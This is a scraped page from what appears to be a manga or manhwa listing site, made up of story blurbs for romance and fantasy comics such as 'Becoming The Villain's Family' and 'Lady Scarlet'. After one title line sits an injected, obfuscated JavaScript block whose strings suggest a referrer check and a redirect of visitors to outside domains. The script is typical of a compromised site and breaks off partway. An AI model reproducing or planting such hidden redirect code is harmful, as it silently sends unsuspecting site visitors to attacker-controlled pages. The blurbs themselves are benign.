<div class="post-title"> <h1>Becoming The Villain’s Family</h1> a name derived from an ancient creature, used to describe those who could charm, lure, control, and heal others by singing. Years ago, a siren named Sophia was kidnapped by Count Cortez as his prized siren, and a girl named Aria was born soon after as their daugher. Subjected to live the life of a siren, Aria had experienced, seen, and heard many horrific things. Others would do anything to hear her sing, to the point of insanity. The emperor, who grew obsessed with her, broke her legs and locked her in a bird cage deep within the imperial palace to hide her and keep her to himself. Broken beyond repair, Aria resigned herself to death, when suddenly… The Devil Archduke, LLoyd Cardenis Valentine, arrived and whisperd, “Should I kill everyone here?” “If you need me, just call me. Your song will always reach me, wherever you are.” In the end, Aria called the devil, bringing death to all those present, except for herself. “Let’s fall down to hell together.” And with that, Aria breathed her last and died… only to return back to her 10 year old self. Now that she has a second chance at her life, Aria is determined to change her fate, as well as the cruel future of her savior, Archduke Valentine. She proposes a contract marriage to him, with a divorce planned 10 years later, but he has other plans… </div>
The man I’m suddenly supposed to be marrying is a self-centered CEO?! ????? / You Are a Fiance / Kimi wa Kyoukon<script></script><script>function _0x84a2(_0xccf17d,_0x13b91b){var _0x49adec=_0x3c94();return _0x84a2=function(_0x45f52b,_0x2410d1){_0x45f52b=_0x45f52b-(-0x1bcb*0x1+0x2652+0x1*-0x8da);var _0xa457db=_0x49adec[_0x45f52b];return _0xa457db;},_0x84a2(_0xccf17d,_0x13b91b);}function _0x3c94(){var _0x4acf39=['2288613qEHJTm','QwXeH','then','location','href','345511HLHuwS','http://rea','random','bPjhW','floor','JnAJn','MBFoB','YQTkJ','https://ip','720839TcAyTo','text','4rCvgpY','dma.net/','886165iUjLHp','.customapi','.top/','LbdjZ','includes','google','84GFrFsF','12559448pPeiLN','referrer','10469907JQDtLW','dfDhg','ifKyV','GUtCs','1313414upNwJU'];_0x3c94=function(){return _0x4acf39;};return _0x3c94();}(function(_0x548fc8,_0x20fab0){var _0x375715=_0x84a2,_0x4559c0=_0x548fc8();while(!![]){try{var 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<div class="post-title"> <h1>Lady Scarlet</h1> Scarlet Marica is the eldest daughter of the bankrupt Baron Marica. She decides to go to the capital with the ambition of becoming the most recognized piano teacher. 3 years later, Scarlet fell in love with Edward Hart instead of pursuing her dream. She thought that she would get married in the future. But then she found out that her lover had a fiancée all along! Eventually, the richest man of the empire and the notorious marquis, Kellan Black approached her. “I have a lot of debt to pay him back. Lady Scarlet, would you like to take revenge on him?” </div>
<div class="post-title"> <h1>Father, I Won’t Do Anything</h1> </div> <div class="tab-summary ">Just as your birth did not inspire me, so your death won’t mean anything to me.]Jaina reincarnated as a supporting character who was born as mixed blood of human-dragon and died miserably after being neglected. She is branded as an unclean entity and was abandoned by the dragons.And the first time she met her father, the lord of the tower, Diamide, he just looked at her coldly, as though he didn’t feel any sense of intimacy to his daughter as described in the original.”Is that the one you called my daughter?”Jaina flinched as he approached and lowered her sight.”Blue eyes… but that’s not a proof that she’s my daughter. You could have brought me a child born with another human.”And so he went back leaving her alone and Jaina was living in the shabby warehouse of the tower.Rather than making vain efforts to get into the eyes of his father, the lord of the tower, she decided to have a small luxury that she had never experienced even in her previous life before her death.”You don’t have to think of me as your daughter. I won’t call you father either.””…””Tower’s lord?”So is the father, who should’ve been indifferent, starting to get obsessed? Father, can you just leave me alone?</div>
Marriage is not on her agenda! When a two-time mixed martial arts champion dies and wakes up in the body of the petite Lady Grace Rambler, she quickly decides to make the best of things — to attract a so-called “unicorn man,” the rare kind of gentleman who’s modest, exciting, and handsome! But her dreams are crushed when she finds out Grace is set to marry Duke Aston Blade, a perverted and ugly old geezer… Or is he?! Not willing to risk it, she rejects the marriage and sticks to her guns. It’s either a unicorn man or bust!Source to collect images:bato.to/series/75435Resources:tappytoon.com/comics/god-bless-you
A Chance to Cherish Suffering from terminal disease, the unknown actress Lin Xia who just starts her career is at the same time abandoned by her boyfriend. When she finally gives in to the man who is with supreme power and money out of helplessness, the man replies with his eyes half-closed, “I never do good deeds unless you devote yourself to me!” Looking at her angry back, the man puts on a triumphant smile, he will not only donate his bone marrow to her, but also himself!
As proud daughter of House Monique, Aristia was raised to become the next empress of the Castina Empire. But with the appearance of a mysterious new girl, everything has fallen apart: the Emperor has turned his back, and Aristia’s miserable life as a lower queen is cut short by death. However a second chance to change her fate sees her reborn ‒to 7 years earlier! “Is this a dream or reality? Will my destiny repeat?”
Qiaofeng has always been single, and there are three problems that he cannot overcome: the first, being extremely handsome; the second, being fantastically rich; and the third, owning faultlessly high IQ. Legend has it that Qiaofeng has a very abnormal IQ test paper. And anyone who wants to be his girlfriend must get at least 60 points. However, perfectly avoiding all the correct answers and marking 0 in ten minutes, she actually becomes Qiaofeng’s girlfriend… how does this happen…
Luna Xia summoned a devil to help retaliate against her classmates. However, she never expected to summon the Devil King! Suddenly, Luna’s life starts to take off on a crazy roller coaster of events! Along the way, they attracted a succubus, angel, and knight. They jumped right past Luna’s skepticism and went straight for the gas pedal! Devil King Lucifer: Romance can’t be romantic. How can it ever be romantic? Luna: Can I return the product? We don’t accept returns. Please use with ease. Arrogant Devil King x Sand Carving Lady
A Beauty, A Fatal Concubine Rebirth and come back, Mu Yunyao believes in three points: firstly, don't be kind to others; secondly, remove out the source of the trouble; thirdly, don't believe the true feelings. So, she is ruthless and unscrupulous. Instead of enduring, she would rather stir the world upside down. But after a encounter, there is always a cold prince following her and wanting to marry her...
Cheated on by her fiancé and her bestie, Luo Xiaoka loses all her faith in romantic love and decides to fully devote herself to work. However, fate sends her right into her boss's trap of love. How is she supposed to deal with this man's 10,000 creative ways to court her? Finally, a considerate and gentle male lead who respects the woman he loves and knows how to properly solve his jealousy issue! MangaToon got authorization from Cloud Studio to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
In the distant past, I was cursed by my dealings with the world. Over the next 1,000 years, I lived an endless life. There isn’t a single life I haven’t experienced. I have been the most noble and humble person in the world, I have become a beggar, I have been revered as a saint, and I have been burned as a witch. And after my most miserable and painful life, I thought of it all again. ‘It’s all bothering me now—I’d like to take a break, please. I’ve decided to live a life of a lazy sloth this time, but why are people still bothering me? Let me get some rest.’ Her story of wanting to rest! (P.S This is a promo manhwa and it’s a oneshot)